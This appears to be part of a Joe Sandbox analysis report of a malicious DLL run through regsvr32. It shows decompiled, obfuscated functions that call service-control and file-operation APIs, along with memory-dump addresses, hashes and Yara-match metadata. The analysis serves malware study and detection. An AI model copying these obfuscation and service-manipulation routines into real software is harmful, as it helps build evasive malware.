						_t800 =  *0x6da8126c; // 0x0
						_t1208 =  *0x6da8126c; // 0x0
						_t444 =  *0x6da81260; // 0x0
						_t803 =  *0x6da8126c; // 0x0
						_t1212 =  *0x6da81268; // 0x0
						_t806 =  *0x6da8126c; // 0x0
						_t1216 =  *0x6da81260; // 0x0
						_t808 =  *0x6da8126c; // 0x0
						_t1218 =  *0x6da8126c; // 0x0
						_t461 =  *0x6da81260; // 0x0
						_t811 =  *0x6da8126c; // 0x0
						_t1222 =  *0x6da81268; // 0x0
						_t814 =  *0x6da8126c; // 0x0
						_t1226 =  *0x6da81260; // 0x0
						_t816 =  *0x6da8126c; // 0x0
						_t1228 =  *0x6da8126c; // 0x0
						_t478 =  *0x6da81260; // 0x0
						_t819 =  *0x6da8126c; // 0x0
						_t1232 =  *0x6da81268; // 0x0
						memset(_v12, 0, _t478 *  *0x6da81268 + _t1228 *  *0x6da8125c + _t461 *  *0x6da81268 + _t1218 *  *0x6da8125c + _t444 *  *0x6da81268 + _t1208 *  *0x6da8125c + _t427 *  *0x6da81268 + _t1198 *  *0x6da8125c + _t410 *  *0x6da81268 + _t1188 *  *0x6da8125c + _t393 *  *0x6da81268 + _t1178 *  *0x6da8125c + _v16 -  *0x6da81260 +  *0x6da81264 + _t774 *  *0x6da81268 -  *0x6da81270 + _t1176 *  *0x6da8125c + _t776 *  *0x6da8125c *  *0x6da81260 -  *0x6da81260 +  *0x6da8126c +  *0x6da8126c +  *0x6da81270 +  *0x6da81268 +  *0x6da8126c + _t779 *  *0x6da81260 *  *0x6da81270 - _t1182 *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c -  *0x6da81260 +  *0x6da81264 + _t782 *  *0x6da81268 -  *0x6da81270 + _t1186 *  *0x6da8125c + _t784 *  *0x6da8125c *  *0x6da81260 -  *0x6da81260 +  *0x6da8126c +  *0x6da8126c +  *0x6da81270 +  *0x6da81268 +  *0x6da8126c + _t787 *  *0x6da81260 *  *0x6da81270 - _t1192 *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c -  *0x6da81260 +  *0x6da81264 + _t790 *  *0x6da81268 -  *0x6da81270 + _t1196 *  *0x6da8125c + _t792 *  *0x6da8125c *  *0x6da81260 -  *0x6da81260 +  *0x6da8126c +  *0x6da8126c +  *0x6da81270 +  *0x6da81268 +  *0x6da8126c + _t795 *  *0x6da81260 *  *0x6da81270 - _t1202 *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c -  *0x6da81260 +  *0x6da81264 + _t798 *  *0x6da81268 -  *0x6da81270 + _t1206 *  *0x6da8125c + _t800 *  *0x6da8125c *  *0x6da81260 -  *0x6da81260 +  *0x6da8126c +  *0x6da8126c +  *0x6da81270 +  *0x6da81268 +  *0x6da8126c + _t803 *  *0x6da81260 *  *0x6da81270 - _t1212 *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c -  *0x6da81260 +  *0x6da81264 + _t806 *  *0x6da81268 -  *0x6da81270 + _t1216 *  *0x6da8125c + _t808 *  *0x6da8125c *  *0x6da81260 -  *0x6da81260 +  *0x6da8126c +  *0x6da8126c +  *0x6da81270 +  *0x6da81268 +  *0x6da8126c + _t811 *  *0x6da81260 *  *0x6da81270 - _t1222 *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c -  *0x6da81260 +  *0x6da81264 + _t814 *  *0x6da81268 -  *0x6da81270 + _t1226 *  *0x6da8125c + _t816 *  *0x6da8125c *  *0x6da81260 -  *0x6da81260 +  *0x6da8126c +  *0x6da8126c +  *0x6da81270 +  *0x6da81268 +  *0x6da8126c + _t819 *  *0x6da81260 *  *0x6da81270 - _t1232 *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c);
						_t1236 = _t1239 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x6da2fba9
0x6da2fbac
0x6da2fbc0
0x6da2fbd3
0x6da2fbe9
0x6da2fc09
0x6da2fc1b
0x6da2fc26
0x6da2fc31
0x6da2fc3c
0x6da2fc4e
0x6da2fc60
0x6da2fc79
0x6da2fc8b
0x6da2fc96
0x6da2fca8
0x6da2fcb3
0x6da2fcda
0x6da2fcdd
0x6da2fcf8
0x6da2fd07
0x6da2fd1c
0x6da2fd2b
0x6da2fd52
0x6da2fd61
0x6da2fd83
0x6da2fd98
0x6da2fdad
0x6da2fdbc
0x6da2fde3
0x6da2fdf2
0x6da2fe14
0x6da2fe26
0x00000000
0x00000000
0x6da2fe33
0x6da30906
0x6da3090c
0x6da30945
0x6da30996
0x6da309e6
0x6da30a37
0x6da30a52
0x6da30a71
0x6da30a8c
0x6da30ab6
0x6da30ac5
0x6da30ada
0x6da30af6
0x6da30b12
0x6da30b3c
0x6da30b4a
0x6da30b5f
0x6da30b7a
0x6da30b96
0x6da30bbf
0x6da30bce
0x6da30be2
0x6da30bfe
0x6da30c19
0x6da30c43
0x6da30c52
0x6da30c67
0x6da30c83
0x6da30c9f
0x6da30cc9
0x6da30cd7
0x6da30ced
0x6da30cf2
0x6da30cf7
0x6da30d03
0x6da30d07
0x6da30d2f
0x6da30d39
0x6da30d66
0x6da30d7b
0x6da30d91
0x6da30db2
0x6da30dde
0x6da30df3
0x6da30e08
0x6da30e29
0x6da30e56
0x6da30e6a
0x6da30e80
0x6da30e9e
0x6da30eb9
0x6da30ed9
0x6da30efa
0x6da30f0f
0x6da30f3b
0x6da30f5c
0x6da30f7c
0x6da30f91
0x6da30fad
0x6da30fb4
0x6da30fb7
0x6da30fb9
0x6da30fbc
0x6da30fc3
0x6da30fed
0x6da31007
0x6da3101c
0x6da3102b
0x6da31046
0x6da3106d
0x6da3109a
0x6da310b5
0x6da310c9
0x6da310d8
0x6da310f2
0x6da31119
0x6da31145
0x6da31160
0x6da31175
0x6da31183
0x6da3119e
0x6da311c4
0x6da311d9
0x6da311ee
0x6da31203
0x6da31223
0x6da3123f
0x6da31259
0x6da3126e
0x6da3128f
0x6da312aa
0x6da312d4
0x6da312da
0x6da312e6
0x6da3130d
0x6da31334
0x6da3135b
0x6da31391
0x6da313c0
0x6da313ef
0x6da3141e
0x6da3143e
0x6da2fce6
0x6da2fcec
0x6da2fcf5
0x00000000
0x6da2fcf5
0x00000000
0x6da30fc5
0x00000000
0x6da30cf9
0x6da2fe3f
0x6da2fe46
0x6da308fe
0x00000000
0x6da308fe
0x6da2fe4f
0x6da2fe53
0x6da2fe6e
0x6da2fe83
0x6da2feb6
0x6da2fed7
0x6da2feed
0x6da2ff01
0x6da2ff34
0x6da2ff56
0x6da2ff6b
0x6da2ff80
0x6da2ffb2
0x6da2ffd4
0x6da2ffea
0x6da2ffff
0x6da30032
0x6da30054
0x6da3005a
0x6da30060
0x6da3007d
0x6da3009a
0x6da300af
0x6da300d2
0x6da300ee
0x6da30104
0x6da30126
0x6da30143
0x6da30158
0x6da3017c
0x6da3017f
0x6da3018e
0x6da301a0
0x6da301a3
0x6da301a5
0x6da301a8
0x6da301af
0x6da301c7
0x6da301e4
0x6da301f9
0x6da3021c
0x6da30238
0x6da3024e
0x6da30270
0x6da3028d
0x6da302a2
0x6da302bd
0x6da302bf
0x6da302c2
0x6da302eb
0x6da302fa
0x6da3031a
0x6da30329
0x6da30337
0x6da30354
0x6da30369
0x6da3037e
0x6da30393
0x6da303ba
0x6da303c8
0x6da303e9
0x6da303f7
0x6da30406
0x6da30422
0x6da30438
0x6da3044c
0x6da30468
0x6da3047a
0x6da3048f
0x6da3049e
0x6da304ba
0x6da304cf
0x6da304f5
0x6da3050b
0x6da3053a
0x6da3054f
0x6da3055e
0x6da3057a
0x6da3058f
0x6da305b5
0x6da305cb
0x6da305fa
0x6da3060f
0x6da3061e
0x6da3063a
0x6da3064f
0x6da30675
0x6da3068b
0x6da306ba
0x6da306cf
0x6da306de
0x6da306fa
0x6da3070f
0x6da30735
0x6da3074b
0x6da3077a
0x6da3078f
0x6da3079e
0x6da307ba
0x6da307cf
0x6da307f5
0x6da3080b
0x6da3083a
0x6da3084f
0x6da3085e
0x6da3087a
0x6da3088f
0x6da308b5
0x6da308cb
0x6da308f5
0x6da308fb
0x00000000
0x6da308fb
0x00000000
0x6da301b1
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecaadc3ffb04338ad7e01d5efb8cd889b03bf0e68fc8e0ae9474525bc6b7f9e8
Instruction ID: 3cecf5b762822faf8884fb100e0d73de458837110a0873befc00d89a33b7988a
Opcode Fuzzy Hash: ecaadc3ffb04338ad7e01d5efb8cd889b03bf0e68fc8e0ae9474525bc6b7f9e8
Instruction Fuzzy Hash: 8DE2717650D3018FCF08DE28CAD5B75F7B5F6B7356B85D2258821CA298E730A427CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 100032B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100032B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E10009E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E1001BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x100032be
0x100032bf
0x100032c2
0x100032c3
0x100032c8
0x100032cd
0x100032d6
0x100032d9
0x100032dc
0x100032e9
0x100032ec
0x100032f4
0x100032f5
0x100032fa
0x10003304
0x1000330b
0x1000330f
0x10003316
0x1000331d
0x10003324
0x10003335
0x10003338
0x1000333c
0x10003343
0x1000334a
0x10003361
0x10003364
0x10003377
0x10003384
0x1000338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 10003384

Strings

w\ y, xrefs: 1000331D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 2673d0b832e4d885b295aa3d0736083a12d9b67bb68571235ce8c26550880700
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 5C2123B5D01228FBDB04DFA9D84A9EEBFB5FF40344F208189E424AA250D3B56B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E1001BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x1000c4f2
0x1000c4f5
0x1000c4f7
0x1000c4fa
0x1000c4fd
0x1000c500
0x1000c501
0x1000c502
0x1000c507
0x1000c50e
0x1000c515
0x1000c51c
0x1000c523
0x1000c52a
0x1000c52d
0x1000c531
0x1000c538
0x1000c53f
0x1000c556
0x1000c55e
0x1000c562
0x1000c569
0x1000c570
0x1000c577
0x1000c57e
0x1000c585
0x1000c58c
0x1000c593
0x1000c59a
0x1000c5ad
0x1000c5bc
0x1000c5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 1000C5BC

Strings

", xrefs: 1000C577

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: 888a1af328b60e3115df81a15206c86fde9c8a5b62bfb3d5199cc9c56e09e132
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: BF2120B6C0020DEBCF15DFA4D8499EEBBB4FF04318F108598E9256A260E3B19B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1001A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E10009E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E1001BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x1001a994
0x1001a997
0x1001a99c
0x1001a9a1
0x1001a9a7
0x1001a9ae
0x1001a9b5
0x1001a9c2
0x1001a9c5
0x1001a9c8
0x1001a9cf
0x1001a9db
0x1001a9dc
0x1001a9e1
0x1001a9eb
0x1001a9f2
0x1001a9f9
0x1001aa00
0x1001aa17
0x1001aa1a
0x1001aa2b
0x1001aa2e
0x1001aa41
0x1001aa4c
0x1001aa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 1001AA4C

Strings

ijp, xrefs: 1001A9EB

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: 08d8414517ae60290be451ade77ec7b27b58724690d5fe81316851794a35ed95
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: D62117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C199E404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 1000338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1000338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E10009E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E1001BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x10003391
0x10003396
0x1000339b
0x100033a1
0x100033a5
0x100033ac
0x100033b9
0x100033bd
0x100033c0
0x100033c7
0x100033d8
0x100033db
0x100033f2
0x100033f5
0x100033fc
0x10003403
0x1000340a
0x1000340e
0x10003415
0x1000341c
0x10003427
0x1000342a
0x10003431
0x10003444
0x1000344f
0x10003454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 1000344F

Strings

|[0, xrefs: 100033FC

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: 33a28676a97f025cdeb7d50283b02d7e423aae746988ab354802b81ac360808e
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 0D2124B4D00209EFDF04DFA5C94AAAEBBB4FB00304F108189E424AA290D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3CD80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6DA3CD80(void* __ecx) {
				int _v8;
				intOrPtr* _t4;

				if( *0x6da83d74 == 0) {
					ExitProcess(0);
				}
				_v8 = 0;
				_t4 =  *0x6da83d74; // 0x461938
				_v8 = E6DA380E0(_t4, "DllRegisterServer");
				_v8();
				return 0;
			}

0x6da3cd8b
0x6da3cd8f
0x6da3cd8f
0x6da3cd95
0x6da3cda1
0x6da3cdaf
0x6da3cdb2
0x6da3cdba

APIs

ExitProcess.KERNEL32 ref: 6DA3CD8F

Strings

DllRegisterServer, xrefs: 6DA3CD9C

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: 890aeee3e1e21a2ad07266899500c5ca117a8087637add45b8425f9d3f4cd493
Instruction ID: 2bd08401c32d6ece810b6ed5a97a317427130d716e4429d9589a25eafcffe815
Opcode Fuzzy Hash: 890aeee3e1e21a2ad07266899500c5ca117a8087637add45b8425f9d3f4cd493
Instruction Fuzzy Hash: 1EE08CBA80D318AFCB009BF0DE0972EBBF8AB07307F014594E908E6241F77656408B51

Uniqueness

Uniqueness Score: -1.00%

Function 1001E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E10009E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E1001BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x1001e37a
0x1001e37d
0x1001e37f
0x1001e382
0x1001e384
0x1001e389
0x1001e392
0x1001e399
0x1001e3a0
0x1001e3a7
0x1001e3ae
0x1001e3b5
0x1001e3bc
0x1001e3c3
0x1001e3cf
0x1001e3d5
0x1001e3d8
0x1001e3df
0x1001e3e6
0x1001e3ed
0x1001e3f4
0x1001e40b
0x1001e413
0x1001e426
0x1001e42f
0x1001e435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,10013F2A,00000000), ref: 1001E42F

Strings

M8, xrefs: 1001E3ED

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: eb367e5f18db3a68d22521a23e7b1cd58748ba1d5980e3efdeacfb35b3ff9a68
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 991129B5D00209EFDF58CFE4C94989EBBB4EB40324F108299E824B6291D7B55B059F91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA33D70 Relevance: 2.2, APIs: 1, Instructions: 718
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E6DA33D70(intOrPtr* _a4, void** _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t60;
				signed int _t62;
				signed int _t64;
				signed int _t107;
				signed int _t109;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t133;
				signed int _t135;
				signed int _t139;
				signed int _t145;
				signed int _t147;
				signed int _t150;
				signed int _t169;
				signed int _t171;
				signed int _t175;
				signed int _t181;
				signed int _t183;
				signed int _t186;
				int _t198;
				signed int _t201;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t218;
				signed int _t220;
				signed int _t223;
				signed int _t225;
				signed int _t228;
				signed int _t230;
				signed int _t233;
				signed int _t235;
				signed int _t238;
				signed int _t240;
				signed int _t249;
				signed int _t251;
				signed int _t255;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t317;
				signed int _t319;
				signed int _t321;
				signed int _t323;
				signed int _t327;
				signed int _t335;
				signed int _t337;
				signed int _t340;
				signed int _t343;
				signed int _t347;
				signed int _t351;
				signed int _t357;
				signed int _t359;
				signed int _t362;
				signed int _t381;
				signed int _t383;
				signed int _t387;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t417;
				signed int _t420;
				signed int _t427;
				signed int _t428;
				signed int _t431;
				signed int _t433;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				signed int _t448;
				signed int _t451;
				signed int _t453;
				signed int _t461;
				signed int _t482;
				signed int _t484;
				signed int _t486;
				signed int _t490;
				signed int _t498;
				signed int _t500;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				signed int _t520;
				signed int _t522;
				signed int _t534;
				signed int _t537;
				signed int _t556;
				signed int _t558;
				signed int _t562;
				signed int _t568;
				signed int _t570;
				signed int _t573;
				signed int _t592;
				signed int _t594;
				signed int _t598;
				signed int _t604;
				signed int _t606;
				signed int _t708;
				signed int _t710;
				signed int _t712;
				signed int _t716;
				signed int _t737;

				if(_a8[2] != 0) {
					_t498 =  *0x6da81260; // 0x0
					_t60 =  *0x6da81260; // 0x0
					_t500 =  *0x6da81260; // 0x0
					_t62 =  *0x6da81260; // 0x0
					_t4 =  &(_a8[3]); // 0x1
					if((0x02000000 -  *0x6da81270 +  *0x6da8125c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t498 *  *0x6da81268 -  *0x6da81270 +  *0x6da8125c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t60 *  *0x6da81268 -  *0x6da81270 +  *0x6da8125c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t500 *  *0x6da81268 -  *0x6da81270 +  *0x6da8125c -  *0x6da81268 -  *0x6da8126c +  *0x6da8125c + _t62 *  *0x6da81268 &  *_t4) == 0) {
						_t33 =  &(_a8[3]); // 0x1
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(0x20000000 -  *0x6da8126c &  *_t33));
						_t64 =  *0x6da81260; // 0x0
						_t36 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v24 =  ~( ~(_t64 + 0x40000000 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 -  *0x6da81270 &  *_t36));
						_t504 =  *0x6da8126c; // 0x0
						_t317 =  *0x6da8126c; // 0x0
						_t506 =  *0x6da81264; // 0x0
